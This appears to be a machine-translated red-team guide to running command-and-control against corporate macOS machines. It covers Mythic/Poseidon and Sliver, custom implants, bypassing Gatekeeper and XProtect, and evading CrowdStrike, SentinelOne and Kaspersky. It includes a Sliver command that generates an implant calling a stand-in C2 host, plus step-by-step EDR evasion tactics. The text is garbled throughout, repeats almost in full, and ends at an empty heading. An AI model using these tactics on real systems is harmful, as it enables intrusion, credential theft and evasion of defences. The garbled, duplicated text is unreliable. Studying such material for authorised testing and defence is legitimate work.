Kill chain macOS operations: where C2 stands
Corporate Mac is Keychain with OAuth tokens, VPN configurations, active Slack and Teams sessions, SSH keys without a pass-free. According to CrowdStrike Global Threat Report 2025, 79% of attacks are delayed without malware (living off the land), and 75% of the intrusions use valid accounts. One compromised Mac with an active SSO session gives an lateral movement without a single exploit.
The C2 frameture solves three specific problems: a stable control channel bypassing the EDR, post-exploitation of macOS-specific storage (Keychain, TCC-base), a reference point for moving to the corporate network.
Full chain with binding to MITRE ATT&CK:
1. Initial access - spear-phishing with .dmg/.pkg, supply chain, watering hole
2. Defense Evasion - bypass Gatekeeper (T1553.001, Gatekeeper Bypass). Atomic Red Team tests for T1553.001 are implemented for macOS (executor: sh). Evasion precedes execution - do not mix
3. Execution - launch of payload. The Malicious File (T1204.0012) is described by MITRE as cross-platform equipment, but the industrial tests of the Atomic Red Team are only implemented for it under Windows. There are no ready-made atomic tests on macOS, validation requires custom scenarios
4. C2 callback - implant establishes a connection with the C2-server
5. Persistence - LaunchAgent/LaunchDaemon, Dylib Hijacking (T1574.004, Persistence, Privilege Escalation and Defense Evasion)
6. Post-exploitation - Keychain dam, credentialing, lateral movement
C2 - bridge between a one-time foothold and a full-fledged operation. Without a stable channel, you lose access at the first reboot.
Fingerprinting before the choice of C2
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
Before deploying C2 on the macOS-target, you need to answer four questions. On them depends the choice of framework and configuration:
1. MacOS version and architecture. sw_versand uname -mgive a version of the OS and the type of processor (arm64 vs x86_64). On the Apple Silicon AMFI blocks unsigned code even when turned off Gatekeeper and SIP - for delivery it is critical
2. What EDR is worth. Through ps aux | grep -i -E "falcon|sentinelone|kaspersky"or analysis of LaunchDeamons in /Library/LaunchDaemons/. Specific vendor determines the permissible transport and traffic profile
3. MDM provider. Jamf (jamf checkJSSConnection), Kandji, the other one. MDM monitors changes to LaunchAgents via Endpoint Security API - persistence is immediately questionable
4. Network restrictions. Proxy, Little Snitch / Lulu (user-mode firewalls), corporate DNS - all this determines what transport (HTTPS, DNS, mTLS) will pass. Little Snitch blocks outgoing connections of unknown processes and shows the user alert - staging through DNS in such conditions is useless, the connection will die before the channel is installed
Mythic C2 macOS: architecture and Poseidon-agent
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
Mythic is a multi-platform C2 framework from SpecterOps with an agent-aesthetic architecture. Key: the server is not tied to a particular agent. Connect the agent as a Docker container - get a single web interface, transaction logging and multi-operator mode. Several pentesters work with one agents at the same time, seeing each other’s actions in real time.
Surrounding requirements for the Mythic server: Linux (Ubuntu 20.04+), at least 4 GB RAM (recommended for parallel operation of several operators), Docker and Docker Comperse. Go 1.21+ is automatically pulled when compiling Poseidon-payload. Network: HTTPS/HTTPer on server, optional DNS for fallback channel.
Poseidon - the main macOS agent for Mythic, written on Go. According to SentinelOne, Poseidon is a Golangent agent that "beascons back to an operator" and gives a set of post-exploitation capabilities: working with Keychain, screenshot, clipboard, teller file shell, execution, processing.
Payload is created through the Mythic web interface: select Poseidon agent, specify callback host/port, transport (HTTP/HTTPS/websoft), clashback and jitter. The server compiles the Go-binary and gives the finished file.
Other macOS agents in Mythic:
• Appell - JXA agent in MythicAgents/appell. Apfell was the original name of the Mythic framework itself (renamed ~2020); JXA agent retained its name, but the active development has shifted to Poseidon
• Apollo - . Mythic NET agent, sharpened under Windows (MythicAgents/Apollo). JSS URL Substitution Technique in /Library/Preferences/com.jamfsoftware.jamf.plistto intercept the C2 channel via MDM is described in the community, but a specialized Mythic agent for JAMF abuse in the public repository of MythicAgents at the time of writing not found
• Orthrus is mentioned in the context of delivery via .mobileconfig MDM profiles, but the public repository of MythicAgents/Orthus at the time of writing is not available; the existence and status of the agent are not confirmed
Not to be confused: Poseidon (Mythic agent) and Poseidon Stealer are completely different tools with the same name. According to Red Canary, Poseidon Stealer was active in 2024-early 2025, then sold and rebranded as Odyssey Stealer. This is a criminal macOS-ballar, has nothing to do with Mythic agent.
When Mythic Doesn't Work:
• Little Snitch / Lulu - custom firewalls block the outgoing connections of the Poseidon agent, requiring manual permission from the victim. Staging Fails Without Social Engineering
• CrowdStrike Falcon for Mac - monitors child processes from osascriptand shell-commands, direct execution through do shell scriptcaught by a behavioral engine
• AMFI on Apple Silicon - payload without code signing is blocked when loading into memory, even if Gatekeeper and SIP are disabled. In the kernel logs: "AMFI: code signature validation failed"
• Overhead deployment - Docker infrastructure is redundant for quick one-shot pentest. If you need a quick result - Sliver is easier
Sliver framework macOS: monolithic C2 with native cross-compilation
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
BishopFox is a C2-frimword compiler implant as a native Gobinary. Unlike the modular Mythic, Sliver monolithin: server, implant generation and control - one binary. Operating interface - CLI via gRPC (not web).
Adjustments to the environment: Linux or macOS for server, at least 2 GB RAM, Go toolchain is tightened automatically. Cross-compilation for macOS arm64/x86_64 is built-in - a separate macOS host is not needed.
Architectural differences from Mythic:
• Transportations: mTLS, HTTPS, DNS, WireGuard - channel set wider
• Built-in support for arm64 and x86_64 without additional configuration
• Expansion through BOF (Beacon Object Files) and extensions
• Multi-operator mode via gRPC
Bash:
generate --os darwin --arch arm64 \
--http https://c2.example.com \
--name macos-implant \
--skip-symbols \
--save /tmp/
Stageless vs staged - for macOS definitely stageless. The staged implant makes two network appeals: the first behind the stack, the second for the main payload. On machines with Little Snitch or corporate proxy, this doubles the chances of detection. Stageless binary is heavier (8-15 MB), but one callback - and you're inside.
When Sliver Doesn't Work:
• SentinelOne for macOS detects standard Sliver implants by behavioral patterns at staging. DNS-transport is burning especially fast: the characteristic subdomain length, frequency of requests
• Binary size - 8-15 MB suspicious for "utilities" delivered through phishing
• Default HTTP profiles - easily signaled by XProtect and EDR. Malleable profiles are required
• macOS-specific teams are limited compared to Poseidon: there is no built-in access to Keychain, no clipboard monitoring - all through shell or BOF
Decision tree of choice:
• Target - purely macOS-float, operation for weeks, need Keychain → Mythic + Poseidon
• Mixed Park (macOS + Windows + Linux), need a DNS channel → Sliver
• Mature SOC with CrowdStrike/SentinelOne, any public C2 burns → custom implant
Kastomic macOS implants: when frames are not enough
[Applicable to: red team operations vs. mature SOC with macOS EDR]
Public frameworks on infrastructure with an actual EDR - a signed verdict. CrowdStrike and SentinelOne update Sliver and Poseidon online. Kastom implant is the only working option.
Gos Swift: language selection
Go - standard for cross-platform implants. Poseidon is written in Go, a set of libraries for C2-communications (HTTP clients, crypto, DNS) is mature. Problem: Gobinari is characterized by heavy (5+ MB) and have a recognizable structure of sections.
Swift - native to macOS, binarys are much smaller, the calls of the macOS API look legitimate without a layer cgo. Problem: there is no cross-platform, more difficult CI/CD.
Objective-C - to work with legacy Cocoa API and Kerberos. Bifrost (tool for macOS Kerberos-attacks) is written in Objective-C to interact with the Heimdal krb5 API.
For clean macOS operations, Swift gives less footprint and best mimicry. For multi-platform - Go with aggressive obfuscation. In most of the mixed projects from my practice, the custom implant was on Go - because the fleet mixed and one binary assembled under darwin/arm64, darwin/amd64 and linux/amd64.
Code and Gatekeeper Bypass
Bypass Gatekeeper (T1553.001, tactics of Defense Evasion) - a mandatory stage, separate from execution. Three options:
1. Ad-hoc Signal through codesign --force --deep --sign -- minimal. Sequoia 15:x requires manual permission through System Settings → Privacy & Security
2. Developer ID (bought or stolen) - The binary passes Gatekeeper and notarization, if the certificate is not withdrawn by Apple
3. Delivery without quarantine - files through curl, wgetor SMB-ball (Finder → Cmd+K) do not receive an attribute com.apple.quarantineand bypass Gatekeeper completely
According to Red Canary, in October 2024, Apple closed the vulnerability, which allowed to bypass Gatekeeper through the right clique → “Open”. Mulvar (including Atomic Stealer) has previously instructed the victims in this way. After the patch, the spread shifted to ClickFix / paste-and-run methods - social engineering instead of technical vulnerabilities.
AMFI on Apple Silicon checks the signature when loading the binary in memory regardless of Gatekeeper and SIP. On the Apple Silicon ad-hoc signing - the minimum requirement, the completely unsigned code will not start.
XProtect evasion
XProtect - Apple antivirus engine with signatures based on the YARA-rules, updated automatically. Standard Sliver/Mythic payload enters the database. According to SentinelOne, among macOS payload there are at least 7 obfuscation techniques. In practice, for the bypass of XProtect, two are enough: string encryption (characterized user-agent, URL-patterns) and re-assembly from the source with a refactoring of the binary structure - renaming of functions, changing the order of initialization.
OPSEC and evasion on the vendors macOS EDR
CrowdStrike Falcon for Mac
• Monitoring of child processes from curl, wget, osascript- pattern "curl downloads binary → binary starts" triggering alert
• Sliver DNS channels are detected by subdomain length and frequency of requests
• Bypass: custom HTTP profile with jitter 30-50%, mimicry for legitimate SaaS traffic (Slack API, Teams webhooks), do not use osascriptas a launcher
SentinelOne for macOS
• Behavioral analysis at staging: two-phase load (stager → payload) = alert
• Detects standard Sliver mTLS-hundshesheks by characteristic TLS-parameters
• Bypass: stageless implant, HTTPS with custom SNI, delivery through legitimate proxy-endpoint
Kaspersky Endpoint Security for Mac
• Less aggressive in behavioral analysis - a priority on a signature base
• Bypass: Reassembled implant with a change in binary structure is usually sufficient, the behavioral detect is less difficult
Sigma-rules and D3FEND
Corporate Mac is Keychain with OAuth tokens, VPN configurations, active Slack and Teams sessions, SSH keys without a pass-free. According to CrowdStrike Global Threat Report 2025, 79% of attacks are delayed without malware (living off the land), and 75% of the intrusions use valid accounts. One compromised Mac with an active SSO session gives an lateral movement without a single exploit.
The C2 frameture solves three specific problems: a stable control channel bypassing the EDR, post-exploitation of macOS-specific storage (Keychain, TCC-base), a reference point for moving to the corporate network.
Full chain with binding to MITRE ATT&CK:
1. Initial access - spear-phishing with .dmg/.pkg, supply chain, watering hole
2. Defense Evasion - bypass Gatekeeper (T1553.001, Gatekeeper Bypass). Atomic Red Team tests for T1553.001 are implemented for macOS (executor: sh). Evasion precedes execution - do not mix
3. Execution - launch of payload. The Malicious File (T1204.0012) is described by MITRE as cross-platform equipment, but the industrial tests of the Atomic Red Team are only implemented for it under Windows. There are no ready-made atomic tests on macOS, validation requires custom scenarios
4. C2 callback - implant establishes a connection with the C2-server
5. Persistence - LaunchAgent/LaunchDaemon, Dylib Hijacking (T1574.004, Persistence, Privilege Escalation and Defense Evasion)
6. Post-exploitation - Keychain dam, credentialing, lateral movement
C2 - bridge between a one-time foothold and a full-fledged operation. Without a stable channel, you lose access at the first reboot.
Fingerprinting before the choice of C2
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
Before deploying C2 on the macOS-target, you need to answer four questions. On them depends the choice of framework and configuration:
1. MacOS version and architecture. sw_versand uname -mgive a version of the OS and the type of processor (arm64 vs x86_64). On the Apple Silicon AMFI blocks unsigned code even when turned off Gatekeeper and SIP - for delivery it is critical
2. What EDR is worth. Through ps aux | grep -i -E "falcon|sentinelone|kaspersky"or analysis of LaunchDeamons in /Library/LaunchDaemons/. Specific vendor determines the permissible transport and traffic profile
3. MDM provider. Jamf (jamf checkJSSConnection), Kandji, the other one. MDM monitors changes to LaunchAgents via Endpoint Security API - persistence is immediately questionable
4. Network restrictions. Proxy, Little Snitch / Lulu (user-mode firewalls), corporate DNS - all this determines what transport (HTTPS, DNS, mTLS) will pass. Little Snitch blocks outgoing connections of unknown processes and shows the user alert - staging through DNS in such conditions is useless, the connection will die before the channel is installed
Mythic C2 macOS: architecture and Poseidon-agent
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
Mythic is a multi-platform C2 framework from SpecterOps with an agent-aesthetic architecture. Key: the server is not tied to a particular agent. Connect the agent as a Docker container - get a single web interface, transaction logging and multi-operator mode. Several pentesters work with one agents at the same time, seeing each other’s actions in real time.
Surrounding requirements for the Mythic server: Linux (Ubuntu 20.04+), at least 4 GB RAM (recommended for parallel operation of several operators), Docker and Docker Comperse. Go 1.21+ is automatically pulled when compiling Poseidon-payload. Network: HTTPS/HTTPer on server, optional DNS for fallback channel.
Poseidon - the main macOS agent for Mythic, written on Go. According to SentinelOne, Poseidon is a Golangent agent that "beascons back to an operator" and gives a set of post-exploitation capabilities: working with Keychain, screenshot, clipboard, teller file shell, execution, processing.
Payload is created through the Mythic web interface: select Poseidon agent, specify callback host/port, transport (HTTP/HTTPS/websoft), clashback and jitter. The server compiles the Go-binary and gives the finished file.
Other macOS agents in Mythic:
• Appell - JXA agent in MythicAgents/appell. Apfell was the original name of the Mythic framework itself (renamed ~2020); JXA agent retained its name, but the active development has shifted to Poseidon
• Apollo - . Mythic NET agent, sharpened under Windows (MythicAgents/Apollo). JSS URL Substitution Technique in /Library/Preferences/com.jamfsoftware.jamf.plistto intercept the C2 channel via MDM is described in the community, but a specialized Mythic agent for JAMF abuse in the public repository of MythicAgents at the time of writing not found
• Orthrus is mentioned in the context of delivery via .mobileconfig MDM profiles, but the public repository of MythicAgents/Orthus at the time of writing is not available; the existence and status of the agent are not confirmed
Not to be confused: Poseidon (Mythic agent) and Poseidon Stealer are completely different tools with the same name. According to Red Canary, Poseidon Stealer was active in 2024-early 2025, then sold and rebranded as Odyssey Stealer. This is a criminal macOS-ballar, has nothing to do with Mythic agent.
When Mythic Doesn't Work:
• Little Snitch / Lulu - custom firewalls block the outgoing connections of the Poseidon agent, requiring manual permission from the victim. Staging Fails Without Social Engineering
• CrowdStrike Falcon for Mac - monitors child processes from osascriptand shell-commands, direct execution through do shell scriptcaught by a behavioral engine
• AMFI on Apple Silicon - payload without code signing is blocked when loading into memory, even if Gatekeeper and SIP are disabled. In the kernel logs: "AMFI: code signature validation failed"
• Overhead deployment - Docker infrastructure is redundant for quick one-shot pentest. If you need a quick result - Sliver is easier
Sliver framework macOS: monolithic C2 with native cross-compilation
[Applicable: internal and external pumption, macOS Ventura 13.x - Sequoia 15.x]
BishopFox is a C2-frimword compiler implant as a native Gobinary. Unlike the modular Mythic, Sliver monolithin: server, implant generation and control - one binary. Operating interface - CLI via gRPC (not web).
Adjustments to the environment: Linux or macOS for server, at least 2 GB RAM, Go toolchain is tightened automatically. Cross-compilation for macOS arm64/x86_64 is built-in - a separate macOS host is not needed.
Architectural differences from Mythic:
• Transportations: mTLS, HTTPS, DNS, WireGuard - channel set wider
• Built-in support for arm64 and x86_64 without additional configuration
• Expansion through BOF (Beacon Object Files) and extensions
• Multi-operator mode via gRPC
Bash:
generate --os darwin --arch arm64 \
--http https://c2.example.com \
--name macos-implant \
--skip-symbols \
--save /tmp/
Stageless vs staged - for macOS definitely stageless. The staged implant makes two network appeals: the first behind the stack, the second for the main payload. On machines with Little Snitch or corporate proxy, this doubles the chances of detection. Stageless binary is heavier (8-15 MB), but one callback - and you're inside.
When Sliver Doesn't Work:
• SentinelOne for macOS detects standard Sliver implants by behavioral patterns at staging. DNS-transport is burning especially fast: the characteristic subdomain length, frequency of requests
• Binary size - 8-15 MB suspicious for "utilities" delivered through phishing
• Default HTTP profiles - easily signaled by XProtect and EDR. Malleable profiles are required
• macOS-specific teams are limited compared to Poseidon: there is no built-in access to Keychain, no clipboard monitoring - all through shell or BOF
Decision tree of choice:
• Target - purely macOS-float, operation for weeks, need Keychain → Mythic + Poseidon
• Mixed Park (macOS + Windows + Linux), need a DNS channel → Sliver
• Mature SOC with CrowdStrike/SentinelOne, any public C2 burns → custom implant
Kastomic macOS implants: when frames are not enough
[Applicable to: red team operations vs. mature SOC with macOS EDR]
Public frameworks on infrastructure with an actual EDR - a signed verdict. CrowdStrike and SentinelOne update Sliver and Poseidon online. Kastom implant is the only working option.
Gos Swift: language selection
Go - standard for cross-platform implants. Poseidon is written in Go, a set of libraries for C2-communications (HTTP clients, crypto, DNS) is mature. Problem: Gobinari is characterized by heavy (5+ MB) and have a recognizable structure of sections.
Swift - native to macOS, binarys are much smaller, the calls of the macOS API look legitimate without a layer cgo. Problem: there is no cross-platform, more difficult CI/CD.
Objective-C - to work with legacy Cocoa API and Kerberos. Bifrost (tool for macOS Kerberos-attacks) is written in Objective-C to interact with the Heimdal krb5 API.
For clean macOS operations, Swift gives less footprint and best mimicry. For multi-platform - Go with aggressive obfuscation. In most of the mixed projects from my practice, the custom implant was on Go - because the fleet mixed and one binary assembled under darwin/arm64, darwin/amd64 and linux/amd64.
Code and Gatekeeper Bypass
Bypass Gatekeeper (T1553.001, tactics of Defense Evasion) - a mandatory stage, separate from execution. Three options:
1. Ad-hoc Signal through codesign --force --deep --sign -- minimal. Sequoia 15:x requires manual permission through System Settings → Privacy & Security
2. Developer ID (bought or stolen) - The binary passes Gatekeeper and notarization, if the certificate is not withdrawn by Apple
3. Delivery without quarantine - files through curl, wgetor SMB-ball (Finder → Cmd+K) do not receive an attribute com.apple.quarantineand bypass Gatekeeper completely
According to Red Canary, in October 2024, Apple closed the vulnerability, which allowed to bypass Gatekeeper through the right clique → “Open”. Mulvar (including Atomic Stealer) has previously instructed the victims in this way. After the patch, the spread shifted to ClickFix / paste-and-run methods - social engineering instead of technical vulnerabilities.
AMFI on Apple Silicon checks the signature when loading the binary in memory regardless of Gatekeeper and SIP. On the Apple Silicon ad-hoc signing - the minimum requirement, the completely unsigned code will not start.
XProtect evasion
XProtect - Apple antivirus engine with signatures based on the YARA-rules, updated automatically. Standard Sliver/Mythic payload enters the database. According to SentinelOne, among macOS payload there are at least 7 obfuscation techniques. In practice, for the bypass of XProtect, two are enough: string encryption (characterized user-agent, URL-patterns) and re-assembly from the source with a refactoring of the binary structure - renaming of functions, changing the order of initialization.
OPSEC and evasion on the vendors macOS EDR
CrowdStrike Falcon for Mac
• Monitoring of child processes from curl, wget, osascript- pattern "curl downloads binary → binary starts" triggering alert
• Sliver DNS channels are detected by subdomain length and frequency of requests
• Bypass: custom HTTP profile with jitter 30-50%, mimicry for legitimate SaaS traffic (Slack API, Teams webhooks), do not use osascriptas a launcher
SentinelOne for macOS
• Behavioral analysis at staging: two-phase load (stager → payload) = alert
• Detects standard Sliver mTLS-hundshesheks by characteristic TLS-parameters
• Bypass: stageless implant, HTTPS with custom SNI, delivery through legitimate proxy-endpoint
Kaspersky Endpoint Security for Mac
• Less aggressive in behavioral analysis - a priority on a signature base
• Bypass: Reassembled implant with a change in binary structure is usually sufficient, the behavioral detect is less difficult
Sigma-rules and D3FEND
